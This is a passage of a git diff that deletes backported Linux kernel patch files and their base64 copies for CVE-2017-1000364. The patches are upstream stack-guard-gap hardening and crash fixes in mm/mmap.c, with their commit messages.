mVzcyBzcGFjZSBsaW1pdCB0ZXN0cyAqLwogCWlmICghbWF5X2V4cGFuZF92bShtbSwgZ3JvdykpCiAJCXJldHVybiAtRU5PTUVNOwogCiAJLyogU3RhY2sgbGltaXQgdGVzdCAqLwotCWFjdHVhbF9zaXplID0gc2l6ZTsKLQlpZiAoc2l6ZSAmJiAodm1hLT52bV9mbGFncyAmIChWTV9HUk9XU1VQIHwgVk1fR1JPV1NET1dOKSkpCi0JCWFjdHVhbF9zaXplIC09IFBBR0VfU0laRTsKLQlpZiAoYWN0dWFsX3NpemUgPiBBQ0NFU1NfT05DRShybGltW1JMSU1JVF9TVEFDS10ucmxpbV9jdXIpKQorCWlmIChzaXplID4gQUNDRVNTX09OQ0UocmxpbVtSTElNSVRfU1RBQ0tdLnJsaW1fY3VyKSkKIAkJcmV0dXJuIC1FTk9NRU07CiAKIAkvKiBtbG9jayBsaW1pdCB0ZXN0cyAqLwpAQCAtMjEzMSwzMiArMjE0NSw0MCBAQAogICovCiBpbnQgZXhwYW5kX3Vwd2FyZHMoc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsIHVuc2lnbmVkIGxvbmcgYWRkcmVzcykKIHsKLQlpbnQgZXJyb3I7CisJc3RydWN0IHZtX2FyZWFfc3RydWN0ICpuZXh0OworCXVuc2lnbmVkIGxvbmcgZ2FwX2FkZHI7CisJaW50IGVycm9yID0gMDsKIAogCWlmICghKHZtYS0+dm1fZmxhZ3MgJiBWTV9HUk9XU1VQKSkKIAkJcmV0dXJuIC1FRkFVTFQ7CiAKLQkvKgotCSAqIFdlIG11c3QgbWFrZSBzdXJlIHRoZSBhbm9uX3ZtYSBpcyBhbGxvY2F0ZWQKLQkgKiBzbyB0aGF0IHRoZSBhbm9uX3ZtYSBsb2NraW5nIGlzIG5vdCBhIG5vb3AuCi0JICovCisJLyogR3VhcmQgYWdhaW5zdCB3cmFwcGluZyBhcm91bmQgdG8gYWRkcmVzcyAwLiAqLworCWFkZHJlc3MgJj0gUEFHRV9NQVNLOworCWFkZHJlc3MgKz0gUEFHRV9TSVpFOworCWlmICghYWRkcmVzcykKKwkJcmV0dXJuIC1FTk9NRU07CisKKwkvKiBFbmZvcmNlIHN0YWNrX2d1YXJkX2dhcCAqLworCWdhcF9hZGRyID0gYWRkcmVzcyArIHN0YWNrX2d1YXJkX2dhcDsKKwlpZiAoZ2FwX2FkZHIgPCBhZGRyZXNzKQorCQlyZXR1cm4gLUVOT01FTTsKKwluZXh0ID0gdm1hLT52bV9uZXh0OworCWlmIChuZXh0ICYmIG5leHQtPnZtX3N0YXJ0IDwgZ2FwX2FkZHIpIHsKKwkJaWYgKCEobmV4dC0+dm1fZmxhZ3MgJiBWTV9HUk9XU1VQKSkKKwkJCXJldHVybiAtRU5PTUVNOworCQkvKiBDaGVjayB0aGF0IGJvdGggc3RhY2sgc2VnbWVudHMgaGF2ZSB0aGUgc2FtZSBhbm9uX3ZtYT8gKi8KKwl9CisKKwkvKiBXZSBtdXN0IG1ha2Ugc3VyZSB0aGUgYW5vbl92bWEgaXMgYWxsb2NhdGVkLiAqLwogCWlmICh1bmxpa2VseShhbm9uX3ZtYV9wcmVwYXJlKHZtYSkpKQogCQlyZXR1cm4gLUVOT01FTTsKLQl2bWFfbG9ja19hbm9uX3ZtYSh2bWEpOwogCiAJLyoKIAkgKiB2bWEtPnZtX3N0YXJ0L3ZtX2VuZCBjYW5ub3QgY2hhbmdlIHVuZGVyIHVzIGJlY2F1c2UgdGhlIGNhbGxlcgogCSAqIGlzIHJlcXVpcmVkIHRvIGhvbGQgdGhlIG1tYXBfc2VtIGluIHJlYWQgbW9kZS4gIFdlIG5lZWQgdGhlCiAJICogYW5vbl92bWEgbG9jayB0byBzZXJpYWxpemUgYWdhaW5zdCBjb25jdXJyZW50IGV4cGFuZF9zdGFja3MuCi0JICogQWxzbyBndWFyZCBhZ2FpbnN0IHdyYXBwaW5nIGFyb3VuZCB0byBhZGRyZXNzIDAuCiAJICovCi0JaWYgKGFkZHJlc3MgPCBQQUdFX0FMSUdOKGFkZHJlc3MrNCkpCi0JCWFkZHJlc3MgPSBQQUdFX0FMSUdOKGFkZHJlc3MrNCk7Ci0JZWxzZSB7Ci0JCXZtYV91bmxvY2tfYW5vbl92bWEodm1hKTsKLQkJcmV0dXJuIC1FTk9NRU07Ci0JfQotCWVycm9yID0gMDsKKwl2bWFfbG9ja19hbm9uX3ZtYSh2bWEpOwogCiAJLyogU29tZWJvZHkgZWxzZSBtaWdodCBoYXZlIHJhY2VkIGFuZCBleHBhbmRlZCBpdCBhbHJlYWR5ICovCiAJaWYgKGFkZHJlc3MgPiB2bWEtPnZtX2VuZCkgewpAQCAtMjE4Nyw3ICsyMjA5LDcgQEAKIAkJCQlpZiAodm1hLT52bV9uZXh0KQogCQkJCQl2bWFfZ2FwX3VwZGF0ZSh2bWEtPnZtX25leHQpOwogCQkJCWVsc2UKLQkJCQkJdm1hLT52bV9tbS0+aGlnaGVzdF92bV9lbmQgPSBhZGRyZXNzOworCQkJCQl2bWEtPnZtX21tLT5oaWdoZXN0X3ZtX2VuZCA9IHZtX2VuZF9nYXAodm1hKTsKIAkJCQlzcGluX3VubG9jaygmdm1hLT52bV9tbS0+cGFnZV90YWJsZV9sb2NrKTsKIAogCQkJCXBlcmZfZXZlbnRfbW1hcCh2bWEpOwpAQCAtMjIwNywyNyArMjIyOSwzNiBAQAogaW50IGV4cGFuZF9kb3dud2FyZHMoc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsCiAJCQkJICAgdW5zaWduZWQgbG9uZyBhZGRyZXNzKQogeworCXN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqcHJldjsKKwl1bnNpZ25lZCBsb25nIGdhcF9hZGRyOwogCWludCBlcnJvcjsKLQotCS8qCi0JICogV2UgbXVzdCBtYWtlIHN1cmUgdGhlIGFub25fdm1hIGlzIGFsbG9jYXRlZAotCSAqIHNvIHRoYXQgdGhlIGFub25fdm1hIGxvY2tpbmcgaXMgbm90IGEgbm9vcC4KLQkgKi8KLQlpZiAodW5saWtlbHkoYW5vbl92bWFfcHJlcGFyZSh2bWEpKSkKLQkJcmV0dXJuIC1FTk9NRU07CiAKIAlhZGRyZXNzICY9IFBBR0VfTUFTSzsKIAllcnJvciA9IHNlY3VyaXR5X21tYXBfYWRkcihhZGRyZXNzKTsKIAlpZiAoZXJyb3IpCiAJCXJldHVybiBlcnJvcjsKIAotCXZtYV9sb2NrX2Fub25fdm1hKHZtYSk7CisJLyogRW5mb3JjZSBzdGFja19ndWFyZF9nYXAgKi8KKwlnYXBfYWRkciA9IGFkZHJlc3MgLSBzdGFja19ndWFyZF9nYXA7CisJaWYgKGdhcF9hZGRyID4gYWRkcmVzcykKKwkJcmV0dXJuIC1FTk9NRU07CisJcHJldiA9IHZtYS0+dm1fcHJldjsKKwlpZiAocHJldiAmJiBwcmV2LT52bV9lbmQgPiBnYXBfYWRkcikgeworCQlpZiAoIShwcmV2LT52bV9mbGFncyAmIFZNX0dST1dTRE9XTikpCisJCQlyZXR1cm4gLUVOT01FTTsKKwkJLyogQ2hlY2sgdGhhdCBib3RoIHN0YWNrIHNlZ21lbnRzIGhhdmUgdGhlIHNhbWUgYW5vbl92bWE/ICovCisJfQorCisJLyogV2UgbXVzdCBtYWtlIHN1cmUgdGhlIGFub25fdm1hIGlzIGFsbG9jYXRlZC4gKi8KKwlpZiAodW5saWtlbHkoYW5vbl92bWFfcHJlcGFyZSh2bWEpKSkKKwkJcmV0dXJuIC1FTk9NRU07CiAKIAkvKgogCSAqIHZtYS0+dm1fc3RhcnQvdm1fZW5kIGNhbm5vdCBjaGFuZ2UgdW5kZXIgdXMgYmVjYXVzZSB0aGUgY2FsbGVyCiAJICogaXMgcmVxdWlyZWQgdG8gaG9sZCB0aGUgbW1hcF9zZW0gaW4gcmVhZCBtb2RlLiAgV2UgbmVlZCB0aGUKIAkgKiBhbm9uX3ZtYSBsb2NrIHRvIHNlcmlhbGl6ZSBhZ2FpbnN0IGNvbmN1cnJlbnQgZXhwYW5kX3N0YWNrcy4KIAkgKi8KKwl2bWFfbG9ja19hbm9uX3ZtYSh2bWEpOwogCiAJLyogU29tZWJvZHkgZWxzZSBtaWdodCBoYXZlIHJhY2VkIGFuZCBleHBhbmRlZCBpdCBhbHJlYWR5ICovCiAJaWYgKGFkZHJlc3MgPCB2bWEtPnZtX3N0YXJ0KSB7CkBAIC0yMjY5LDI4ICsyMzAwLDI1IEBACiAJcmV0dXJuIGVycm9yOwogfQogCi0vKgotICogTm90ZSBob3cgZXhwYW5kX3N0YWNrKCkgcmVmdXNlcyB0byBleHBhbmQgdGhlIHN0YWNrIGFsbCB0aGUgd2F5IHRvCi0gKiBhYnV0IHRoZSBuZXh0IHZpcnR1YWwgbWFwcGluZywgKnVubGVzcyogdGhhdCBtYXBwaW5nIGl0c2VsZiBpcyBhbHNvCi0gKiBhIHN0YWNrIG1hcHBpbmcuIFdlIHdhbnQgdG8gbGVhdmUgcm9vbSBmb3IgYSBndWFyZCBwYWdlLCBhZnRlciBhbGwKLSAqICh0aGUgZ3VhcmQgcGFnZSBpdHNlbGYgaXMgbm90IGFkZGVkIGhlcmUsIHRoYXQgaXMgZG9uZSBieSB0aGUKLSAqIGFjdHVhbCBwYWdlIGZhdWx0aW5nIGxvZ2ljKQotICoKLSAqIFRoaXMgbWF0Y2hlcyB0aGUgYmVoYXZpb3Igb2YgdGhlIGd1YXJkIHBhZ2UgbG9naWMgKHNlZSBtbS9tZW1vcnkuYzoKLSAqIGNoZWNrX3N0YWNrX2d1YXJkX3BhZ2UoKSksIHdoaWNoIG9ubHkgYWxsb3dzIHRoZSBndWFyZCBwYWdlIHRvIGJlCi0gKiByZW1vdmVkIHVuZGVyIHRoZXNlIGNpcmN1bXN0YW5jZXMuCi0gKi8KKy8qIGVuZm9yY2VkIGdhcCBiZXR3ZWVuIHRoZSBleHBhbmRpbmcgc3RhY2sgYW5kIG90aGVyIG1hcHBpbmdzLiAqLwordW5zaWduZWQgbG9uZyBzdGFja19ndWFyZF9nYXAgPSAyNTZVTDw8UEFHRV9TSElGVDsKKworc3RhdGljIGludCBfX2luaXQgY21kbGluZV9wYXJzZV9zdGFja19ndWFyZF9nYXAoY2hhciAqcCkKK3sKKwl1bnNpZ25lZCBsb25nIHZhbDsKKwljaGFyICplbmRwdHI7CisKKwl2YWwgPSBzaW1wbGVfc3RydG91bChwLCAmZW5kcHRyLCAxMCk7CisJaWYgKCEqZW5kcHRyKQorCQlzdGFja19ndWFyZF9nYXAgPSB2YWwgPDwgUEFHRV9TSElGVDsKKworCXJldHVybiAwOworfQorX19zZXR1cCgic3RhY2tfZ3VhcmRfZ2FwPSIsIGNtZGxpbmVfcGFyc2Vfc3RhY2tfZ3VhcmRfZ2FwKTsKKwogI2lmZGVmIENPTkZJR19TVEFDS19HUk9XU1VQCiBpbnQgZXhwYW5kX3N0YWNrKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHJlc3MpCiB7Ci0Jc3RydWN0IHZtX2FyZWFfc3RydWN0ICpuZXh0OwotCi0JYWRkcmVzcyAmPSBQQUdFX01BU0s7Ci0JbmV4dCA9IHZtYS0+dm1fbmV4dDsKLQlpZiAobmV4dCAmJiBuZXh0LT52bV9zdGFydCA9PSBhZGRyZXNzICsgUEFHRV9TSVpFKSB7Ci0JCWlmICghKG5leHQtPnZtX2ZsYWdzICYgVk1fR1JPV1NVUCkpCi0JCQlyZXR1cm4gLUVOT01FTTsKLQl9CiAJcmV0dXJuIGV4cGFuZF91cHdhcmRzKHZtYSwgYWRkcmVzcyk7CiB9CiAKQEAgLTIzMTIsMTQgKzIzNDAsNiBAQAogI2Vsc2UKIGludCBleHBhbmRfc3RhY2soc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsIHVuc2lnbmVkIGxvbmcgYWRkcmVzcykKIHsKLQlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnByZXY7Ci0KLQlhZGRyZXNzICY9IFBBR0VfTUFTSzsKLQlwcmV2ID0gdm1hLT52bV9wcmV2OwotCWlmIChwcmV2ICYmIHByZXYtPnZtX2VuZCA9PSBhZGRyZXNzKSB7Ci0JCWlmICghKHByZXYtPnZtX2ZsYWdzICYgVk1fR1JPV1NET1dOKSkKLQkJCXJldHVybiAtRU5PTUVNOwotCX0KIAlyZXR1cm4gZXhwYW5kX2Rvd253YXJkcyh2bWEsIGFkZHJlc3MpOwogfQogCkBAIC0yNDE1LDcgKzI0MzUsNyBAQAogCQl2bWEtPnZtX3ByZXYgPSBwcmV2OwogCQl2bWFfZ2FwX3VwZGF0ZSh2bWEpOwogCX0gZWxzZQotCQltbS0+aGlnaGVzdF92bV9lbmQgPSBwcmV2ID8gcHJldi0+dm1fZW5kIDogMDsKKwkJbW0tPmhpZ2hlc3Rfdm1fZW5kID0gcHJldiA/IHZtX2VuZF9nYXAocHJldikgOiAwOwogCXRhaWxfdm1hLT52bV9uZXh0ID0gTlVMTDsKIAltbS0+bW1hcF9jYWNoZSA9IE5VTEw7CQkvKiBLaWxsIHRoZSBjYWNoZS4gKi8KIH0K
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0006.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0006.patch
deleted file mode 100644
index 6bf7094f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0006.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 9d5e8628f6b10904b5c48b5e31f01a98b370ab53 Mon Sep 17 00:00:00 2001
-From: Hugh Dickins <hughd@google.com>
-Date: Tue, 20 Jun 2017 02:10:44 -0700
-Subject: [PATCH] mm: fix new crash in unmapped_area_topdown()
-
-commit f4cb767d76cf7ee72f97dd76f6cfa6c76a5edc89 upstream.
-
-Trinity gets kernel BUG at mm/mmap.c:1963! in about 3 minutes of
-mmap testing.  That's the VM_BUG_ON(gap_end < gap_start) at the
-end of unmapped_area_topdown().  Linus points out how MAP_FIXED
-(which does not have to respect our stack guard gap intentions)
-could result in gap_end below gap_start there.  Fix that, and
-the similar case in its alternative, unmapped_area().
-
-Fixes: 1be7107fbe18 ("mm: larger stack guard gap, between vmas")
-Change-Id: I4403e032a62f034df7991a3aa08f56ae7f7a20a6
-Reported-by: Dave Jones <davej@codemonkey.org.uk>
-Debugged-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Hugh Dickins <hughd@google.com>
-Acked-by: Michal Hocko <mhocko@suse.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
-
-diff --git a/mm/mmap.c b/mm/mmap.c
-index 70cf32e..b6ad709 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -1721,7 +1721,8 @@
- 		/* Check if current node has a suitable gap */
- 		if (gap_start > high_limit)
- 			return -ENOMEM;
--		if (gap_end >= low_limit && gap_end - gap_start >= length)
-+		if (gap_end >= low_limit &&
-+		    gap_end > gap_start && gap_end - gap_start >= length)
- 			goto found;
- 
- 		/* Visit right subtree if it looks promising */
-@@ -1824,7 +1825,8 @@
- 		gap_end = vm_start_gap(vma);
- 		if (gap_end < low_limit)
- 			return -ENOMEM;
--		if (gap_start <= high_limit && gap_end - gap_start >= length)
-+		if (gap_start <= high_limit &&
-+		    gap_end > gap_start && gap_end - gap_start >= length)
- 			goto found;
- 
- 		/* Visit left subtree if it looks promising */
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0006.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0006.patch.base64
deleted file mode 100644
index c21c7c63..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0006.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA5ZDVlODYyOGY2YjEwOTA0YjVjNDhiNWUzMWYwMWE5OGIzNzBhYjUzIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBIdWdoIERpY2tpbnMgPGh1Z2hkQGdvb2dsZS5jb20+CkRhdGU6IFR1ZSwgMjAgSnVuIDIwMTcgMDI6MTA6NDQgLTA3MDAKU3ViamVjdDogW1BBVENIXSBtbTogZml4IG5ldyBjcmFzaCBpbiB1bm1hcHBlZF9hcmVhX3RvcGRvd24oKQoKY29tbWl0IGY0Y2I3NjdkNzZjZjdlZTcyZjk3ZGQ3NmY2Y2ZhNmM3NmE1ZWRjODkgdXBzdHJlYW0uCgpUcmluaXR5IGdldHMga2VybmVsIEJVRyBhdCBtbS9tbWFwLmM6MTk2MyEgaW4gYWJvdXQgMyBtaW51dGVzIG9mCm1tYXAgdGVzdGluZy4gIFRoYXQncyB0aGUgVk1fQlVHX09OKGdhcF9lbmQgPCBnYXBfc3RhcnQpIGF0IHRoZQplbmQgb2YgdW5tYXBwZWRfYXJlYV90b3Bkb3duKCkuICBMaW51cyBwb2ludHMgb3V0IGhvdyBNQVBfRklYRUQKKHdoaWNoIGRvZXMgbm90IGhhdmUgdG8gcmVzcGVjdCBvdXIgc3RhY2sgZ3VhcmQgZ2FwIGludGVudGlvbnMpCmNvdWxkIHJlc3VsdCBpbiBnYXBfZW5kIGJlbG93IGdhcF9zdGFydCB0aGVyZS4gIEZpeCB0aGF0LCBhbmQKdGhlIHNpbWlsYXIgY2FzZSBpbiBpdHMgYWx0ZXJuYXRpdmUsIHVubWFwcGVkX2FyZWEoKS4KCkZpeGVzOiAxYmU3MTA3ZmJlMTggKCJtbTogbGFyZ2VyIHN0YWNrIGd1YXJkIGdhcCwgYmV0d2VlbiB2bWFzIikKQ2hhbmdlLUlkOiBJNDQwM2UwMzJhNjJmMDM0ZGY3OTkxYTNhYTA4ZjU2YWU3ZjdhMjBhNgpSZXBvcnRlZC1ieTogRGF2ZSBKb25lcyA8ZGF2ZWpAY29kZW1vbmtleS5vcmcudWs+CkRlYnVnZ2VkLWJ5OiBMaW51cyBUb3J2YWxkcyA8dG9ydmFsZHNAbGludXgtZm91bmRhdGlvbi5vcmc+ClNpZ25lZC1vZmYtYnk6IEh1Z2ggRGlja2lucyA8aHVnaGRAZ29vZ2xlLmNvbT4KQWNrZWQtYnk6IE1pY2hhbCBIb2NrbyA8bWhvY2tvQHN1c2UuY29tPgpTaWduZWQtb2ZmLWJ5OiBMaW51cyBUb3J2YWxkcyA8dG9ydmFsZHNAbGludXgtZm91bmRhdGlvbi5vcmc+ClNpZ25lZC1vZmYtYnk6IEdyZWcgS3JvYWgtSGFydG1hbiA8Z3JlZ2toQGxpbnV4Zm91bmRhdGlvbi5vcmc+Ci0tLQoKZGlmZiAtLWdpdCBhL21tL21tYXAuYyBiL21tL21tYXAuYwppbmRleCA3MGNmMzJlLi5iNmFkNzA5IDEwMDY0NAotLS0gYS9tbS9tbWFwLmMKKysrIGIvbW0vbW1hcC5jCkBAIC0xNzIxLDcgKzE3MjEsOCBAQAogCQkvKiBDaGVjayBpZiBjdXJyZW50IG5vZGUgaGFzIGEgc3VpdGFibGUgZ2FwICovCiAJCWlmIChnYXBfc3RhcnQgPiBoaWdoX2xpbWl0KQogCQkJcmV0dXJuIC1FTk9NRU07Ci0JCWlmIChnYXBfZW5kID49IGxvd19saW1pdCAmJiBnYXBfZW5kIC0gZ2FwX3N0YXJ0ID49IGxlbmd0aCkKKwkJaWYgKGdhcF9lbmQgPj0gbG93X2xpbWl0ICYmCisJCSAgICBnYXBfZW5kID4gZ2FwX3N0YXJ0ICYmIGdhcF9lbmQgLSBnYXBfc3RhcnQgPj0gbGVuZ3RoKQogCQkJZ290byBmb3VuZDsKIAogCQkvKiBWaXNpdCByaWdodCBzdWJ0cmVlIGlmIGl0IGxvb2tzIHByb21pc2luZyAqLwpAQCAtMTgyNCw3ICsxODI1LDggQEAKIAkJZ2FwX2VuZCA9IHZtX3N0YXJ0X2dhcCh2bWEpOwogCQlpZiAoZ2FwX2VuZCA8IGxvd19saW1pdCkKIAkJCXJldHVybiAtRU5PTUVNOwotCQlpZiAoZ2FwX3N0YXJ0IDw9IGhpZ2hfbGltaXQgJiYgZ2FwX2VuZCAtIGdhcF9zdGFydCA+PSBsZW5ndGgpCisJCWlmIChnYXBfc3RhcnQgPD0gaGlnaF9saW1pdCAmJgorCQkgICAgZ2FwX2VuZCA+IGdhcF9zdGFydCAmJiBnYXBfZW5kIC0gZ2FwX3N0YXJ0ID49IGxlbmd0aCkKIAkJCWdvdG8gZm91bmQ7CiAKIAkJLyogVmlzaXQgbGVmdCBzdWJ0cmVlIGlmIGl0IGxvb2tzIHByb21pc2luZyAqLwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch
deleted file mode 100644
index 3c057152..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 1b92e2fd0b29a21ef3a6a5cd80328730aa6a4bc6 Mon Sep 17 00:00:00 2001
-From: Helge Deller <deller@gmx.de>
-Date: Mon, 19 Jun 2017 17:34:05 +0200
-Subject: [PATCH] Allow stack to grow up to address space limit
-
-commit bd726c90b6b8ce87602208701b208a208e6d5600 upstream.
-
-Fix expand_upwards() on architectures with an upward-growing stack (parisc,
-metag and partly IA-64) to allow the stack to reliably grow exactly up to
-the address space limit given by TASK_SIZE.
-
-Change-Id: I911e49b27d519aae257bf57cadff303e25872a14
-Signed-off-by: Helge Deller <deller@gmx.de>
-Acked-by: Hugh Dickins <hughd@google.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
-
-diff --git a/mm/mmap.c b/mm/mmap.c
-index b6ad709..fa6f890 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -2154,16 +2154,19 @@
- 	if (!(vma->vm_flags & VM_GROWSUP))
- 		return -EFAULT;
- 
--	/* Guard against wrapping around to address 0. */
-+	/* Guard against exceeding limits of the address space. */
- 	address &= PAGE_MASK;
--	address += PAGE_SIZE;
--	if (!address)
-+	if (address >= TASK_SIZE)
- 		return -ENOMEM;
-+	address += PAGE_SIZE;
- 
- 	/* Enforce stack_guard_gap */
- 	gap_addr = address + stack_guard_gap;
--	if (gap_addr < address)
--		return -ENOMEM;
-+
-+	/* Guard against overflow */
-+	if (gap_addr < address || gap_addr > TASK_SIZE)
-+		gap_addr = TASK_SIZE;
-+
- 	next = vma->vm_next;
- 	if (next && next->vm_start < gap_addr) {
- 		if (!(next->vm_flags & VM_GROWSUP))
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch.base64
deleted file mode 100644
index 21e7141a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAxYjkyZTJmZDBiMjlhMjFlZjNhNmE1Y2Q4MDMyODczMGFhNmE0YmM2IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBIZWxnZSBEZWxsZXIgPGRlbGxlckBnbXguZGU+CkRhdGU6IE1vbiwgMTkgSnVuIDIwMTcgMTc6MzQ6MDUgKzAyMDAKU3ViamVjdDogW1BBVENIXSBBbGxvdyBzdGFjayB0byBncm93IHVwIHRvIGFkZHJlc3Mgc3BhY2UgbGltaXQKCmNvbW1pdCBiZDcyNmM5MGI2YjhjZTg3NjAyMjA4NzAxYjIwOGEyMDhlNmQ1NjAwIHVwc3RyZWFtLgoKRml4IGV4cGFuZF91cHdhcmRzKCkgb24gYXJjaGl0ZWN0dXJlcyB3aXRoIGFuIHVwd2FyZC1ncm93aW5nIHN0YWNrIChwYXJpc2MsCm1ldGFnIGFuZCBwYXJ0bHkgSUEtNjQpIHRvIGFsbG93IHRoZSBzdGFjayB0byByZWxpYWJseSBncm93IGV4YWN0bHkgdXAgdG8KdGhlIGFkZHJlc3Mgc3BhY2UgbGltaXQgZ2l2ZW4gYnkgVEFTS19TSVpFLgoKQ2hhbmdlLUlkOiBJOTExZTQ5YjI3ZDUxOWFhZTI1N2JmNTdjYWRmZjMwM2UyNTg3MmExNApTaWduZWQtb2ZmLWJ5OiBIZWxnZSBEZWxsZXIgPGRlbGxlckBnbXguZGU+CkFja2VkLWJ5OiBIdWdoIERpY2tpbnMgPGh1Z2hkQGdvb2dsZS5jb20+ClNpZ25lZC1vZmYtYnk6IExpbnVzIFRvcnZhbGRzIDx0b3J2YWxkc0BsaW51eC1mb3VuZGF0aW9uLm9yZz4KU2lnbmVkLW9mZi1ieTogV2lsbHkgVGFycmVhdSA8d0Axd3QuZXU+Ci0tLQoKZGlmZiAtLWdpdCBhL21tL21tYXAuYyBiL21tL21tYXAuYwppbmRleCBiNmFkNzA5Li5mYTZmODkwIDEwMDY0NAotLS0gYS9tbS9tbWFwLmMKKysrIGIvbW0vbW1hcC5jCkBAIC0yMTU0LDE2ICsyMTU0LDE5IEBACiAJaWYgKCEodm1hLT52bV9mbGFncyAmIFZNX0dST1dTVVApKQogCQlyZXR1cm4gLUVGQVVMVDsKIAotCS8qIEd1YXJkIGFnYWluc3Qgd3JhcHBpbmcgYXJvdW5kIHRvIGFkZHJlc3MgMC4gKi8KKwkvKiBHdWFyZCBhZ2FpbnN0IGV4Y2VlZGluZyBsaW1pdHMgb2YgdGhlIGFkZHJlc3Mgc3BhY2UuICovCiAJYWRkcmVzcyAmPSBQQUdFX01BU0s7Ci0JYWRkcmVzcyArPSBQQUdFX1NJWkU7Ci0JaWYgKCFhZGRyZXNzKQorCWlmIChhZGRyZXNzID49IFRBU0tfU0laRSkKIAkJcmV0dXJuIC1FTk9NRU07CisJYWRkcmVzcyArPSBQQUdFX1NJWkU7CiAKIAkvKiBFbmZvcmNlIHN0YWNrX2d1YXJkX2dhcCAqLwogCWdhcF9hZGRyID0gYWRkcmVzcyArIHN0YWNrX2d1YXJkX2dhcDsKLQlpZiAoZ2FwX2FkZHIgPCBhZGRyZXNzKQotCQlyZXR1cm4gLUVOT01FTTsKKworCS8qIEd1YXJkIGFnYWluc3Qgb3ZlcmZsb3cgKi8KKwlpZiAoZ2FwX2FkZHIgPCBhZGRyZXNzIHx8IGdhcF9hZGRyID4gVEFTS19TSVpFKQorCQlnYXBfYWRkciA9IFRBU0tfU0laRTsKKwogCW5leHQgPSB2bWEtPnZtX25leHQ7CiAJaWYgKG5leHQgJiYgbmV4dC0+dm1fc3RhcnQgPCBnYXBfYWRkcikgewogCQlpZiAoIShuZXh0LT52bV9mbGFncyAmIFZNX0dST1dTVVApKQo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0008.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0008.patch
deleted file mode 100644
index 88454e1f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0008.patch
+++ /dev/null
@@ -1,874 +0,0 @@
-From d4712eb79b17d85c9e354efa2d3156ce50736128 Mon Sep 17 00:00:00 2001
-From: Hugh Dickins <hughd@google.com>
-Date: Mon, 19 Jun 2017 04:03:24 -0700
-Subject: mm: larger stack guard gap, between vmas
-
-commit 1be7107fbe18eed3e319a6c3e83c78254b693acb upstream.
-
-Stack guard page is a useful feature to reduce a risk of stack smashing
-into a different mapping. We have been using a single page gap which
-is sufficient to prevent having stack adjacent to a different mapping.
-But this seems to be insufficient in the light of the stack usage in
-userspace. E.g. glibc uses as large as 64kB alloca() in many commonly
-used functions. Others use constructs liks gid_t buffer[NGROUPS_MAX]
-which is 256kB or stack strings with MAX_ARG_STRLEN.
-
-This will become especially dangerous for suid binaries and the default
-no limit for the stack size limit because those applications can be
-tricked to consume a large portion of the stack and a single glibc call
-could jump over the guard page. These attacks are not theoretical,
-unfortunatelly.
-
-Make those attacks less probable by increasing the stack guard gap
-to 1MB (on systems with 4k pages; but make it depend on the page size
-because systems with larger base pages might cap stack allocations in
-the PAGE_SIZE units) which should cover larger alloca() and VLA stack
-allocations. It is obviously not a full fix because the problem is
-somehow inherent, but it should reduce attack space a lot.
-
-One could argue that the gap size should be configurable from userspace,
-but that can be done later when somebody finds that the new 1MB is wrong
-for some special case applications.  For now, add a kernel command line
-option (stack_guard_gap) to specify the stack gap size (in page units).
-
-Implementation wise, first delete all the old code for stack guard page:
-because although we could get away with accounting one extra page in a
-stack vma, accounting a larger gap can break userspace - case in point,
-a program run with "ulimit -S -v 20000" failed when the 1MB gap was
-counted for RLIMIT_AS; similar problems could come with RLIMIT_MLOCK
-and strict non-overcommit mode.
-
-Instead of keeping gap inside the stack vma, maintain the stack guard
-gap as a gap between vmas: using vm_start_gap() in place of vm_start
-(or vm_end_gap() in place of vm_end if VM_GROWSUP) in just those few
-places which need to respect the gap - mainly arch_get_unmapped_area(),
-and and the vma tree's subtree_gap support for that.
-
-Original-patch-by: Oleg Nesterov <oleg@redhat.com>
-Original-patch-by: Michal Hocko <mhocko@suse.com>
-Signed-off-by: Hugh Dickins <hughd@google.com>
-Acked-by: Michal Hocko <mhocko@suse.com>
-Tested-by: Helge Deller <deller@gmx.de> # parisc
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-[wt: backport to 4.11: adjust context]
-[wt: backport to 4.9: adjust context ; kernel doc was not in admin-guide]
-[wt: backport to 4.4: adjust context ; drop ppc hugetlb_radix changes]
-[wt: backport to 3.18: adjust context ; no FOLL_POPULATE ;
